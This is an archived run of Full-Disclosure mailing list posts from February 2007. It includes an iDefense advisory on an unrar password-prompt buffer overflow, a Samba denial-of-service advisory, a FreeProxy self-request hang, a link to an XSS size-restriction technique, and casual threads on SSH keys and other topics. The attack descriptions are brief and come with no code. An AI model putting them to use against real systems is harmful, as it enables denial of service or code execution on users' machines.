Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 02.07.07: RARLabs Unrar Password Prompt Buffer Overflow Vulnerability

[iDefense Labs]

RARLabs Unrar Password Prompt Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

Unrar is a command line archive extractor for Windows and Linux. For more
information visit the vendor's site at the URL shown below.

http://www.rarlabs.com/

II. DESCRIPTION

Remote exploitation of a stack based buffer overflow vulnerability in
RARLabs Unrar may allow an attacker to execute arbitrary code with the
privileges of the user opening the archive.

Unrar is prone to a stack based buffer overflow when processing specially
crafted password protected archives.

III. ANALYSIS

Exploitation of the vulnerability could allow an attacker to execute
arbitrary code with the privileges of the user opening the file.
Exploitation would require that an attacker hosts a maliciously crafted
document on a website and entice users to visit the site. An attacker
could also e-mail the malicious document and use social engineering
techniques to trick the e-mail recipient into opening the document.

There are several mitigating factors for this vulnerability. Nearly all
Windows users will use the GUI based WinRAR to open archives, and it is
not vulnerable. If users are using the vulnerable command line based
unrar, they still need to interact with the program in order to trigger
the vulnerability. They must respond to the prompt asking for the
password, after which the vulnerability will be triggered. They do not
need to enter a correct password, but they must at least push the enter
key.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version 3.60
for Linux and 3.61 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

RARLabs has addressed this vulnerability with the version 3.70 beta release
of WinRAR.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/12/2006  Initial vendor notification
01/09/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PS Information Leak on HP True64 Alpha OSF1 v5.1 1885

[Andrea Purificato - bunker]

Alle 21:05, martedì 6 febbraio 2007, hai scritto:

> I would guess the behavior you just discovered has been
> known for a long time.

It doesn't mean that things will always be that way :-)
See here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1

> PS: Why should ps to work correctly without the setuid bit?

because all recent "ps" works without it, and remove bit from executable is 
not a workaround in this case.
Maybe it's time to abandon the stone age :-)


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AP report: Hackers attack key Net traffic computers

[Simon Smith]

Amen!


On 2/6/07 9:56 PM, "James Matthews" <[EMAIL PROTECTED]> wrote:

> Yes they hit the .org servers! Maybe this is a little wake up call for all the
> people that don't put money into computer security!
> 
> On 2/6/07, Juha-Matti Laurio  <[EMAIL PROTECTED]> wrote:
>> According to
>> http://seattlepi.nwsource.com/business/1700AP_Internet_Attacks.html
>> 
>> "Experts said the unusually powerful attacks lasted for hours but passed
>> largely unnoticed by most computer users, a testament to the resiliency of
>> the Internet." 
>> 
>> Public CERT sources are pointing to this TEAM CYMRU's DNS Name Server Status
>> Summary page too:
>> http://www.cymru.com/monitoring/dnssumm/index.html
>> 
>> 
>> - Juha-Matti
>> 
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

[Siim Põder]

Yo!

Stan Bubrouski wrote:
> On 2/2/07, Tyop? <[EMAIL PROTECTED]> wrote:
>> key-based login without passphrase is like eating cheese without
>> bred. useless (IMHO).
>>
> 
> Totally, if someone compromises the machine and gets root they get all
> your keys and without a passphrase... yeah no good.

If someone comprimises the machine and gets root your keys are very
likely to be compromised any way. Root can easilly trojan your or
ssh/ssh-agent and retrieve the keys.

Same goes for passwords (although they have to be picked one at a time).


Realistically, it is a pain to have all different passwords for all the
different boxes. You can remember maybe something like 25 or so
passwords if they are complex (if you do better then i'm happy for you)
so you could propably use that if you are managing that kind of number
of different boxes (or sets of similar boxes, if you use the same
password in some cases).

Also, with passwords you have to type them in when you log in to other
machines, so it's possible to lose the password if any host in the chain
is compromised - which is not the case for key auth and agent forwarding.

For key auth and agent forwarding, the issue is that your keys could be
used (not read) while your agent is forwarded.


Now, I presume that I can keep my computer from being compromised. If i
can't do that, I am fucked anyway. I keep the keys in my computer.

Next, I create two sets of private keys, one that I use for user
accounts "gateway hosts" (to get to the machines not directly
accessible) that I ssh-add to my ssh-agent and allow anyone to use.

The second key is used for accounts that I can get root with and I add
them with ssh-add -c so that I would be alerted every time their usage
is requested (SSH_ASKPASS). I forward the agent only to those gateway hosts.

The alert box pops up on my screen with default "Confirm" button
selected so I have to do an extra enter keypress for each logon. You
could require some sort of easy password be typed to the confirmation
box, so that some clever hacker couldn't monitor a remote session of
yours and make his login attempt exacly when you are about to press
enter anyway.


I think it's pretty solid and also comfortable, what do you think?

Siim Põder

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bluepill's Rutkowska was or is a Man ?!

[bambam]

I second that. Bluepill and her other work are awesome and I couldn't
give a toss if they were written by a Martian with three heads.

Just drop it dude and do something else.

On 2/6/07, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> On Tue, 6 Feb 2007 [EMAIL PROTECTED] wrote:
>
> > What is going on ? Is that true ? Any one knows ?
>
> That dude is clearly quite determined to debate this like a matter of
> (inter?)national security, on Wikipedia and elsewhere, but it is getting
> oddly inappropriate.
>
> Get a life and let go.
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
"We have Ph.D.s here who know the stuff cold, and we don't believe
it's possible to protect digital content" -- Steve Jobs

you'll never survive choosing sides against the wretched of the earth

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Useful technique when performing XSS

[pdp (architect)]

http://www.gnucitizen.org/blog/playing-in-large

Basically this article is about how to squeeze more data into size
restricted, unsanitized field. This technique can also be used to hide
attackers activities.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] rPSA-2007-0026-1 samba samba-swat

[rPath Update Announcements]

rPath Security Advisory: 2007-0026-1
Published: 2007-02-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0452
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0453
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0454
https://issues.rpath.com/browse/RPL-1005

Description:
Previous versions of the samba package are vulnerable to a Denial
of Service attack from authenticated users only (CVE-2007-0452).
Two other vulnerabilities resolved in samba 3.0.24 do not apply
to rPath Linux 1 (CVE-2007-0453 and CVE-2007-0454).

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Medium level security hole in FreeProxy

[Tim Brown]

The FreeProxy HTTP proxy server suffers from a denial of service condition 
which causes the server to hang.  This occurs when an attacker makes a 
request for the hostname/portnumber combination in use by the server itself.  
The vendor was notified on the 10th January 2007 and a fix was made available 
on the 24th.  Full details can be found in the attached advisory.
-- 
Tim Brown




NDSA20070206.txt.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Zomg is vulnerable to singing drivers

[n33td33v]

http://www.youtube.com/watch?v=26islwX1mRY


zomg



--
Click for second mortgage, fast & free, no lender fee, approval today
http://tagline.hushmail.com/fc/CAaCXv1QbNK5fv1YO4n7n46sBkdCpm6p/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/